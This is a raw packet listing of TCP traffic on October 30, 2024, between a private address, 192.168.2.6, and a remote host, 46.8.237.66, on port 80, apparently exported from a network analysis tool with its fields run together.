                              Oct 30, 2024 20:19:01.998491049 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.998519897 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:01.998519897 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:01.998565912 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:01.998604059 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.998977900 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.999027014 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:01.999092102 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.999109030 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.999155045 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:01.999174118 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.999185085 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.999229908 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:01.999766111 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.000300884 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.000360966 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.049968958 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.049979925 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.050110102 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.117835045 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.117892027 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.117901087 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.118035078 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.118098974 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.118108034 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.118149042 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.118180990 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.118237019 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.118271112 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.118285894 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.118345022 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.118612051 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.118666887 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.118676901 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.118709087 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.118773937 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.118813038 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.119159937 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.119235992 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.119268894 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.119354010 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.119462013 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.119467020 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.119497061 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.169663906 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.169787884 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.169792891 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.217860937 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.237601042 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.237724066 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.237732887 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.237777948 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.237803936 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.237816095 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.237844944 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.237896919 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.237935066 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.238157034 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.238243103 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.238251925 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.238282919 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.238365889 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.238404989 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.238779068 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.238873005 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.238883018 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.238894939 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.238909006 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.238926888 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.239068985 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.280236006 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.333935022 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.333946943 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.334038019 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.357094049 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.357142925 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.357155085 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.357222080 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.357280970 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.357335091 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.357346058 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.357464075 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.357506037 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.357541084 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.357552052 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.357589006 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.357909918 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.357981920 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.357994080 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.358021975 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.358114958 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.358125925 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.358155012 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.358727932 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.358768940 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.358772993 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.358784914 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.358819962 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.358853102 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.405261040 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.476775885 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.476840019 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.476850033 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.476965904 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.476989031 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.477035999 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.477066994 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.477077961 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.477118969 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.477211952 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.477224112 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.477262020 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.477714062 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.477781057 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.477790117 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.477818012 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.477941036 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.477951050 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.477982044 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.478486061 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.478497028 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.478530884 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.478552103 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.478562117 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.478588104 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.530225039 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.596355915 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.596415043 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.596425056 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.596455097 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.596502066 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.596546888 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.596610069 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.596620083 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.596657991 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.596846104 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.596950054 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.596963882 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.596985102 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.597256899 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.597268105 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.597297907 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.597374916 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.597385883 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.597397089 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.597414017 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.597438097 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.597918034 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.598016977 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.598031044 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.598053932 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.598162889 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.598172903 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.598215103 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.716028929 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.716083050 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.716094971 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.716176987 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.716221094 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.716253996 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.716269970 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.716281891 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.716320038 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.716492891 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.716568947 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.716578960 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.716610909 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.716773033 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.716784000 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.716794968 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.716816902 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.716845989 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.717430115 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.717504978 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.717514992 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.717550039 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.717621088 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.717665911 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.717931032 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.717988968 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.717999935 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.718029976 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.757791996 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.757908106 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.758060932 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.811547041 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.835489988 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.835550070 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.835561991 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.835663080 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.835695982 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.835720062 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.835736990 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.835747957 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.835808992 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.835930109 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.835939884 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.835983992 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.836369038 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.836589098 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.836599112 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.836646080 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.836719990 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.836730957 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.836741924 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.836770058 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.836792946 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.836968899 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.837018967 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.837028980 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.837058067 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.837227106 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.837238073 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.837289095 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.921871901 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.921926022 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.921935081 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.921972036 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.921973944 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.922012091 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.955513000 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.955558062 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.955569029 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.955632925 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.955703020 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.955764055 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.955776930 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.955776930 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.955815077 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.955950022 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.955959082 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.955965042 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.955976009 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.955986977 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.955998898 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.956042051 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.956127882 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.956139088 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.956185102 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.956345081 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.956392050 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.956446886 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.956459045 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.956494093 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:02.956554890 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.956566095 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:02.956609964 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.042195082 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.042249918 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.042260885 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.042331934 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.074774027 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.074846983 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.074857950 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.074944973 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.074973106 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.075009108 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.075087070 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.075088978 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.075098991 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.075134039 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.075186968 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.075217009 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.075227976 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.075273991 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.075443029 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.075517893 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.075529099 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.075572968 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.075659037 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.075669050 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.075728893 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.076076031 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.076087952 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.076133013 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.076136112 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.076195002 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.076427937 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.076508999 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.076519966 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.076529980 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.076575041 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.076607943 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.161355019 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.161438942 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.161448002 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.161545038 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.194267035 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.194336891 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.194345951 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.194401979 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.194483995 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.194495916 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.194504976 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.194550037 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.194647074 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.194685936 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.194758892 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.194842100 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.194853067 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.194911003 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.194911003 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.194921970 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.194931984 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.194960117 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.195257902 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.195327997 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.195331097 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.195338011 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.195384026 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.195480108 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.195488930 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.195543051 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.195822001 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.195884943 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.195894957 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.195960999 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.237838030 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.237901926 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.237910032 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.237940073 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.237963915 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.238091946 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.280865908 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.280945063 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.280956030 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.281003952 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.313918114 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.313965082 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.313982964 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.314057112 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.314083099 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.314093113 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.314104080 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.314157009 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.314263105 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.314337969 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.314439058 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.314440966 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.314449072 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.314515114 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.314583063 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.314591885 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.314644098 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.314876080 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.314973116 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.314982891 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.315026045 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.315139055 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.315150976 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.315191031 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.315468073 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.315479040 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.315512896 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.315545082 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.315582991 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.357453108 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.357500076 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.357508898 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.357539892 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.357639074 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.400566101 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.400609970 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.400621891 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.400779963 CET4970980192.168.2.646.8.237.66
